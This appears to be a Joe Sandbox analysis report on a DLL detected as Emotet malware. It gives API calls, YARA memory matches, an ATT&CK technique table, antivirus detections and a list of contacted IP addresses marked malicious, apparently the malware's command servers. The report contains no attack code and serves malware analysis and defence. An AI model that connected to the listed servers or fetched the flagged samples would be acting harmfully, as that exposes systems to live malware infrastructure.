Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,		2_2_1002221F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _strcpy_s,GetLocaleInfoA,__snwprintf_s,LoadLibraryA,		2_2_1000DFEB

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 2_2_1001C0B0 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

2_2_1001C0B0

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 2_2_1001D747 __lock,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,____lc_codepage_func,__getenv_helper_nolock,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,

2_2_1001D747

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 2_2_10006F89 _memset,GetVersionExA,

2_2_10006F89

Stealing of Sensitive Information:

Yara detected Emotet

Show sources

Source: Yara match	File source: 8.2.rundll32.exe.4ce0000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.4cf0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.5140000.22.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.4ed0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.4980000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.46f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.46f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.4b40000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.4030000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.4820000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.4dc0000.16.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.4cf0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.4980000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.4620000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.4030000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.4090000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.49e0000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.45f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.50c0000.20.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.4e70000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.4620000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.4ec0000.18.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.670000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.4bc0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.670000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.5140000.22.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.4bc0000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.4820000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.49e0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.4ec0000.18.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.45f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.50c0000.20.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.4090000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.4dc0000.16.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.4ed0000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.5130000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.4ce0000.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.4b40000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.5130000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.4e70000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.868792580.0000000004CE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.349560826.0000000004B40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.349903901.0000000004CF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.349400359.00000000046F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.350183619.0000000004ED0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.868395885.0000000004820000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.868126623.0000000004090000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.869093007.00000000050C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.351790067.0000000004030000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.867289690.0000000000670000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.868949205.0000000004EC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.350335367.0000000005130000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.868865834.0000000004DC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.868491768.0000000004980000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.869173450.0000000005140000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.868282805.0000000004620000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.348479056.00000000045F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.868570789.00000000049E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.350044975.0000000004E70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.868675450.0000000004BC0000.00000040.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API1	Path Interception	Process Injection112	Masquerading2	Input Capture2	System Time Discovery2	Remote Services	Input Capture2	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Virtualization/Sandbox Evasion3	LSASS Memory	Query Registry1	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection112	Security Account Manager	Security Software Discovery31	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Ingress Tool Transfer1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Deobfuscate/Decode Files or Information1	NTDS	Virtualization/Sandbox Evasion3	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol11	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Hidden Files and Directories1	LSA Secrets	Process Discovery2	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information2	Cached Domain Credentials	Application Window Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Rundll321	DCSync	Remote System Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	File Deletion1	Proc Filesystem	File and Directory Discovery2	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	System Information Discovery35	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
NjTYb3VyzV.dll	14%	Virustotal		Browse
NjTYb3VyzV.dll	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
8.2.rundll32.exe.50f0000.21.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
3.2.rundll32.exe.4620000.1.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
2.2.rundll32.exe.4720000.1.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
2.2.rundll32.exe.4d20000.5.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
2.2.rundll32.exe.4c40000.3.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
8.2.rundll32.exe.4850000.7.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
8.2.rundll32.exe.4bf0000.13.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
8.2.rundll32.exe.3fb0000.1.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
8.2.rundll32.exe.49b0000.9.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
6.2.rundll32.exe.4060000.1.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
8.2.rundll32.exe.4650000.5.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
2.2.rundll32.exe.5000000.9.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
8.2.rundll32.exe.4df0000.17.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
8.2.rundll32.exe.5170000.23.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
2.2.rundll32.exe.5160000.11.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
8.2.rundll32.exe.4b10000.11.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
8.2.rundll32.exe.4d10000.15.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
8.2.rundll32.exe.4170000.3.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
2.2.rundll32.exe.4ea0000.7.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
8.2.rundll32.exe.4ef0000.19.unpack	100%	Avira	HEUR/AGEN.1110387	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://www.disneyplus.com/legal/your-california-privacy-rights	0%	URL Reputation	safe
http://crl.ver)	0%	Avira URL Cloud	safe
https://www.disneyplus.com/legal/privacy-policy	0%	URL Reputation	safe
https://www.tiktok.com/legal/report/feedback	0%	URL Reputation	safe
http://help.disneyplus.com.	0%	URL Reputation	safe
https://disneyplus.com/legal.	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.disneyplus.com/legal/your-california-privacy-rights	svchost.exe, 00000011.00000003.462591154.00000125DAD90000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.462696616.00000125DAD9A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.462672365.00000125DAD7E000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.462719021.00000125DADD0000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.462749971.00000125DADD0000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://crl.ver)	svchost.exe, 00000011.00000002.483357499.00000125DA4EE000.00000004.00000001.sdmp, svchost.exe, 00000015.00000002.862144227.00000197B5861000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
https://www.disneyplus.com/legal/privacy-policy	svchost.exe, 00000011.00000003.462591154.00000125DAD90000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.462696616.00000125DAD9A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.462672365.00000125DAD7E000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.462719021.00000125DADD0000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.462749971.00000125DADD0000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://www.tiktok.com/legal/report/feedback	svchost.exe, 00000011.00000003.463658536.00000125DAD7E000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://help.disneyplus.com.	svchost.exe, 00000011.00000003.462591154.00000125DAD90000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.462696616.00000125DAD9A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.462672365.00000125DAD7E000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.462719021.00000125DADD0000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.462749971.00000125DADD0000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://disneyplus.com/legal.	svchost.exe, 00000011.00000003.462591154.00000125DAD90000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.462696616.00000125DAD9A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.462672365.00000125DAD7E000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.462719021.00000125DADD0000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.462749971.00000125DADD0000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
195.154.133.20	unknown	France	12876	OnlineSASFR	true
212.237.17.99	unknown	Italy	31034	ARUBA-ASNIT	true
110.232.117.186	unknown	Australia	56038	RACKCORP-APRackCorpAU	true
138.185.72.26	unknown	Brazil	264343	EmpasoftLtdaMeBR	true
81.0.236.90	unknown	Czech Republic	15685	CASABLANCA-ASInternetCollocationProviderCZ	true
103.75.201.2	unknown	Thailand	133496	CDNPLUSCOLTD-AS-APCDNPLUSCOLTDTH	true
216.158.226.206	unknown	United States	19318	IS-AS-1US	true
188.165.214.166	unknown	France	16276	OVHFR	true
107.182.225.142	unknown	United States	32780	HOSTINGSERVICES-INCUS	true
45.118.135.203	unknown	Japan	63949	LINODE-APLinodeLLCUS	true
50.116.54.215	unknown	United States	63949	LINODE-APLinodeLLCUS	true
51.68.175.8	unknown	France	16276	OVHFR	true
103.8.26.102	unknown	Malaysia	132241	SKSATECH1-MYSKSATECHNOLOGYSDNBHDMY	true
41.76.108.46	unknown	South Africa	327979	DIAMATRIXZA	true
91.200.186.228	unknown	Poland	43962	INTENPL	true
103.8.26.103	unknown	Malaysia	132241	SKSATECH1-MYSKSATECHNOLOGYSDNBHDMY	true
178.79.147.66	unknown	United Kingdom	63949	LINODE-APLinodeLLCUS	true
212.237.5.209	unknown	Italy	31034	ARUBA-ASNIT	true
176.104.106.96	unknown	Serbia	198371	NINETRS	true
207.38.84.195	unknown	United States	30083	AS-30083-GO-DADDY-COM-LLCUS	true
212.237.56.116	unknown	Italy	31034	ARUBA-ASNIT	true
191.252.196.221	unknown	Brazil	27715	LocawebServicosdeInternetSABR	true
45.142.114.231	unknown	Germany	44066	DE-FIRSTCOLOwwwfirst-colonetDE	true
210.57.217.132	unknown	Indonesia	38142	UNAIR-AS-IDUniversitasAirlanggaID	true
58.227.42.236	unknown	Korea Republic of	9318	SKB-ASSKBroadbandCoLtdKR	true
185.184.25.237	unknown	Turkey	209711	MUVHOSTTR	true
158.69.222.101	unknown	Canada	16276	OVHFR	true
104.251.214.46	unknown	United States	54540	INCERO-HVVCUS	true

Private

IP
127.0.0.1

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	528810
Start date:	25.11.2021
Start time:	20:10:37
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 28s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	NjTYb3VyzV (renamed file extension from none to dll)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	28
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winDLL@18/7@0/29
EGA Information:	Failed
HDC Information:	Successful, ratio: 28.1% (good quality ratio 27.2%) Quality average: 77.7% Quality standard deviation: 24.2%
HCA Information:	Successful, ratio: 81% Number of executed functions: 65 Number of non-executed functions: 152
Cookbook Comments:	Adjust boot time Enable AMSI Override analysis time to 240s for rundll32
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 92.122.145.220, 173.222.108.226, 173.222.108.210, 20.54.110.249, 23.35.236.56 Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, store-images.s-microsoft.com-c.edgekey.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
20:12:31	API Interceptor	10x Sleep call for process: svchost.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
195.154.133.20	qsd96wjZE5.dll	Get hash	malicious	Browse
	fbVJyEuYg3.dll	Get hash	malicious	Browse
	fbVJyEuYg3.dll	Get hash	malicious	Browse
	e7wz42SkwL.dll	Get hash	malicious	Browse
	BsOnCFhDmv.dll	Get hash	malicious	Browse
	1T596wnM2gZJnEgp.dll	Get hash	malicious	Browse
	1107699960.dll	Get hash	malicious	Browse
	1T596wnM2gZJnEgp.dll	Get hash	malicious	Browse
	1107699960.dll	Get hash	malicious	Browse
	9lJhBw9aSM.dll	Get hash	malicious	Browse
	mLF68FXslK.dll	Get hash	malicious	Browse
	gvWvBni9HcU6I.dll	Get hash	malicious	Browse
	gvWvBni9HcU6I.dll	Get hash	malicious	Browse
	pr2Bw1e98p.dll	Get hash	malicious	Browse
	pr2Bw1e98p.dll	Get hash	malicious	Browse
	982tSWUdff.dll	Get hash	malicious	Browse
	ji2TXozBAl.dll	Get hash	malicious	Browse
	N6CyMVFTbm.dll	Get hash	malicious	Browse
	ji2TXozBAl.dll	Get hash	malicious	Browse
	index.dll	Get hash	malicious	Browse
212.237.17.99	qsd96wjZE5.dll	Get hash	malicious	Browse
	fbVJyEuYg3.dll	Get hash	malicious	Browse
	fbVJyEuYg3.dll	Get hash	malicious	Browse
	e7wz42SkwL.dll	Get hash	malicious	Browse
	BsOnCFhDmv.dll	Get hash	malicious	Browse
	1T596wnM2gZJnEgp.dll	Get hash	malicious	Browse
	1107699960.dll	Get hash	malicious	Browse
	1T596wnM2gZJnEgp.dll	Get hash	malicious	Browse
	1107699960.dll	Get hash	malicious	Browse
	9lJhBw9aSM.dll	Get hash	malicious	Browse
	gvWvBni9HcU6I.dll	Get hash	malicious	Browse
	gvWvBni9HcU6I.dll	Get hash	malicious	Browse
	pr2Bw1e98p.dll	Get hash	malicious	Browse
	pr2Bw1e98p.dll	Get hash	malicious	Browse
	982tSWUdff.dll	Get hash	malicious	Browse
	ji2TXozBAl.dll	Get hash	malicious	Browse
	N6CyMVFTbm.dll	Get hash	malicious	Browse
	ji2TXozBAl.dll	Get hash	malicious	Browse
	a5uyawQx9G.dll	Get hash	malicious	Browse
	bymJNhzejq.dll	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ARUBA-ASNIT	order.exe	Get hash	malicious	Browse	62.149.128.40
	3XVTeL2yOE	Get hash	malicious	Browse	95.110.143.3
	UnHAnaAW.arm7	Get hash	malicious	Browse	217.73.230.164
	UnHAnaAW.x86	Get hash	malicious	Browse	94.177.219.211
	qsd96wjZE5.dll	Get hash	malicious	Browse	212.237.56.116
	fbVJyEuYg3.dll	Get hash	malicious	Browse	212.237.56.116
	fbVJyEuYg3.dll	Get hash	malicious	Browse	212.237.56.116
	e7wz42SkwL.dll	Get hash	malicious	Browse	212.237.56.116
	uranium.arm7	Get hash	malicious	Browse	217.73.230.174
	BsOnCFhDmv.dll	Get hash	malicious	Browse	212.237.56.116
	1T596wnM2gZJnEgp.dll	Get hash	malicious	Browse	212.237.56.116
	1107699960.dll	Get hash	malicious	Browse	212.237.56.116
	1T596wnM2gZJnEgp.dll	Get hash	malicious	Browse	212.237.56.116
	1107699960.dll	Get hash	malicious	Browse	212.237.56.116
	9lJhBw9aSM.dll	Get hash	malicious	Browse	212.237.56.116
	mLF68FXslK.dll	Get hash	malicious	Browse	212.237.5.209
	gvWvBni9HcU6I.dll	Get hash	malicious	Browse	212.237.56.116
	gvWvBni9HcU6I.dll	Get hash	malicious	Browse	212.237.56.116
	pr2Bw1e98p.dll	Get hash	malicious	Browse	212.237.56.116
	pr2Bw1e98p.dll	Get hash	malicious	Browse	212.237.56.116
OnlineSASFR	sample2.xls.xls	Get hash	malicious	Browse	51.15.56.22
	sample2.xls.xls	Get hash	malicious	Browse	51.15.56.22
	EzCOXP6oxy.dll	Get hash	malicious	Browse	195.154.146.35
	IkroV40UrZ.dll	Get hash	malicious	Browse	195.154.146.35
	C1Q17Dg4RT.dll	Get hash	malicious	Browse	195.154.146.35
	MakbLShaqA.dll	Get hash	malicious	Browse	195.154.146.35
	MakbLShaqA.dll	Get hash	malicious	Browse	195.154.146.35
	tUJXpPwU27.dll	Get hash	malicious	Browse	195.154.146.35
	pYebrdRKvR.dll	Get hash	malicious	Browse	195.154.146.35
	pPX9DaPVYj.dll	Get hash	malicious	Browse	195.154.146.35
	wUKXjICs5f.dll	Get hash	malicious	Browse	195.154.146.35
	cRC6TZG6Wx.dll	Get hash	malicious	Browse	195.154.146.35
	qrb6jVwzoe.dll	Get hash	malicious	Browse	195.154.146.35
	1711.doc	Get hash	malicious	Browse	195.154.146.35
	j9ZfvcmyKN	Get hash	malicious	Browse	51.158.220.39
	GQwxmGZFvtg.dll	Get hash	malicious	Browse	195.154.146.35
	wNjqkrm8pH.dll	Get hash	malicious	Browse	195.154.146.35
	5YO8hZg21O.dll	Get hash	malicious	Browse	195.154.146.35
	dUGnMYeP1C.dll	Get hash	malicious	Browse	195.154.146.35
	yFAXc9z51V.dll	Get hash	malicious	Browse	195.154.146.35

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.chk Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.3593198815979092
Encrypted:	false
SSDEEP:	12:SnaaD0JcaaD0JwQQU2naaD0JcaaD0JwQQU:4tgJctgJw/tgJctgJw
MD5:	BF1DC7D5D8DAD7478F426DF8B3F8BAA6
SHA1:	C6B0BDE788F553F865D65F773D8F6A3546887E42
SHA-256:	BE47C764C38CA7A90A345BE183F5261E89B98743B5E35989E9A8BE0DA498C0F2
SHA-512:	00F2412AA04E09EA19A8315D80BE66D2727C713FC0F5AE6A9334BABA539817F568A98CA3A45B2673282BDD325B8B0E2840A393A4DCFADCB16473F5EAF2AF3180
Malicious:	false
Preview:	.......................3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@...................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\edb.log Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	MPEG-4 LOAS
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.24944627613022463
Encrypted:	false
SSDEEP:	1536:BJiRdfVzkZm3lyf49uyc0ga04PdHS9LrM/oVMUdSRU4V:BJiRdwfu2SRU4V
MD5:	E4C7BF4E87E772A012FADB8F520F4855
SHA1:	4C5A57DFC869E2544F3CA335E7B8BD0820286DF3
SHA-256:	D8EE25BEBC2FC35BA10B1810FBB6BA549C9C7489E004C0E5E0B0948E2C403D53
SHA-512:	CAF6AA014758B6632C5F106F48E8ACDADF28BB64533CFF65CA5BE32F44D712935AD4E86444005D82B5553FBDA784F0B8762F05972F1013E9A63B0F28DDC19E9E
Malicious:	false
Preview:	V.d.........@..@.3...w...........................3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.........................................d#.................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage user DataBase, version 0x620, checksum 0x391a54b5, page size 16384, Windows version 10.0
Category:	dropped
Size (bytes):	786432
Entropy (8bit):	0.2506186934871907
Encrypted:	false
